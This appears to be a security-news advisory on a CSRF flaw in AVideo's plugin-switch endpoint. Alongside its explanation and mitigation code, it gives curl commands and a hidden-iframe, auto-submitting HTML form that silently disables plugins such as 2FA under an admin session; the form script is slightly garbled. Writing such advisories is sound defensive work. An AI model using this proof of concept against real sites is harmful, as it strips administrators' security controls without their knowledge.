Listen to this Post
How the mentioned CVE works
The vulnerability resides in objects/pluginSwitch.json.php, an endpoint intended for administrators to enable or disable plugins. The script checks `User::isAdmin()` but performs no CSRF token validation, allowing cross-origin requests to alter plugin states.
Additionally, the `plugins` table is explicitly listed in `ignoreTableSecurityCheck()` within objects/Object.php:529. This bypasses the ORM-level Referer/Origin validation that normally acts as a secondary CSRF defense for ObjectYPT::save().
Session cookies are configured with SameSite=None, enabling cross-origin requests to carry the admin session.
Plugin UUIDs are hardcoded in each plugin’s `getUUID()` method and are consistent across installations (e.g., `LoginControl-5ee8405eaaa16` for the 2FA plugin). These UUIDs are also exposed in frontend JavaScript, making them trivial to discover.
An attacker can host a malicious HTML page that submits POST requests to the vulnerable endpoint, disabling critical security plugins without any visible indication to the admin.
dailycve form
Platform: AVideo
Version: All prior
Vulnerability : CSRF Plugin Disable
Severity: High
date: 2026-04-01
Prediction: 2026-04-15
What Undercode Say:
Analytics
Discover plugin UUIDs from frontend source
curl -s "https://target.avideo.com/" | grep -oP '[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}'
Disable a plugin using an admin session cookie
curl -b "PHPSESSID=ADMIN_SESSION_COOKIE" \
-X POST "https://target.avideo.com/objects/pluginSwitch.json.php" \
-d "uuid=a06505bf-3570-4b1f-977a-fd0e5cab205d&status=inactive"
Verify plugin status (optional)
curl -b "PHPSESSID=ADMIN_SESSION_COOKIE" \
"https://target.avideo.com/admin/index.php" | grep -A2 "Gallery"
how Exploit:
The attacker creates an HTML page containing hidden iframes and forms targeting the vulnerable endpoint. When an authenticated admin visits the page, the forms are automatically submitted, disabling plugins like LoginControl (2FA) or YPTWallet (payments).
<iframe name="f1" style="display:none"></iframe> <form method="POST" target="f1" action="https://target.avideo.com/objects/pluginSwitch.json.php"> <input type="hidden" name="uuid" value="LoginControl-5ee8405eaaa16"> <input type="hidden" name="status" value="inactive"> </form> <script>document.forms[bash].submit();</script>
Protection from this CVE
Add CSRF token validation immediately after the admin check in objects/pluginSwitch.json.php:
if (!isGlobalTokenValid()) {
forbiddenPage('Invalid CSRF token');
}
Additionally, remove the `plugins` table from `ignoreTableSecurityCheck()` or implement referrer/origin checks for that endpoint. Set session cookies with `SameSite=Lax` or `Strict` to prevent cross-origin usage.
Impact
An attacker can silently disable any AVideo plugin, including those enforcing two‑factor authentication, subscription payments, and content access controls. This leads to complete bypass of security features, unrestricted access to paid content, and exposure of private videos with no admin awareness.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

